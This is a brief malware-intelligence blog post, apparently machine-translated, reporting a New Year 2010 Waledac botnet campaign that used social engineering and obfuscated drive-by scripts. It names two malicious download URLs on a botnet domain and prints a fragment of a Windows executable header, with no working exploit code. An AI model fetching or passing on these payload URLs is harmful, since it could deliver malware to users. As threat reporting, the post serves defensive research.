MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

1.1.10

After a long period of inactivity, the botnet consisting waledac again deploy a strategy of infection using the pattern that characterizes it: Social Engineering, that this time advantage as cover the beginning of the new year.

Latest waledac campaigns dating from the middle of the year when propagation strategy used pretended to be a video on Independence Day in the U.S., hosted on YouTube. In fact, the most important activity this year came during the first quarter.

Here we see catches describe waledac timeline about their business during 2009.

However, those who are behind waledac never stopped and have recently used the domain registration date throughout the period of supposed inactivity.

Each page used for the propagation has a script obfuscated with instructions to be executed automatically on the victim machine. Thus, it exploits a weakness and automatically download and execute malware, turning your computer into a node of the botnet to continue with their activities. We then see a screenshot of the script.

Inside the script is the reference to the counter.php file hosting another script and from which it jumps to http://diokxbgrqkgg.com/ld/trest1/ and this http://diokxbgrqkgg.com/nte/trest1. py, where there is another malicious script.

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.$.........y.=u..=u..=u...u..u..

Waledac is back with a new excuse, but judging by the percentage of activity that owns the server where it's housed, it appears that he always remained dormant with very sporadic activities. Even taking into account the folder structure from which to download, seems to have a direct relationship with another threat that is Bredolab well known, and which apparently also associated with some scareware and ZeuS.